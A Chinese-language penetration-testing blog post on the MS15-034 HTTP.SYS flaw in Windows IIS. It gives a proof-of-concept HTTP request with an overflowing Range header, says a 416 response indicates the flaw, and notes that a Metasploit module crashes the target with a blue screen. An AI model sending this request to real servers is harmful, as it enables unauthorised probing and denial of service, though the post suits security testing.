HTTP.SYS远程代码执行漏洞(MS15-034)
登录
侧边栏壁纸
博主昵称
月影

  • 累计撰写 85 篇文章
  • 累计收到 101 条评论
渗透测试

HTTP.SYS远程代码执行漏洞(MS15-034)

月影
月影
2023-02-20 / 3 评论 / 27 阅读 / 正在检测是否收录...

看到这个页面别急着关,测试一下可能存在HTTP.SYS远程代码执行漏洞(MS15-034)这个漏洞
2023-05-23T02:01:41.png

poc如下

GET / HTTP/1.1
Host: xxx.com
Range: bytes=0-18446744073709551615
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

如果返回416说明存在该漏洞

可以用msf中的这两个expolit去测试,注意第一个利用成功会蓝屏
2023-05-23T02:00:28.png

0
暂无标签
版权属于: 月影
本文链接: http://47.100.127.167/index.php/archives/133/
作品采用: 署名-非商业性使用-相同方式共享 4.0 国际 (CC BY-NC-SA 4.0) 》许可协议授权

评论 (3)

取消
  1. 头像
    enomothem.com
    Windows 10 · Google Chrome

    不错不错

    回复
  2. 头像
    1
    MacOS · Google Chrome

    画图

    回复
  3. 头像
    1
    MacOS · Google Chrome

    画图

    回复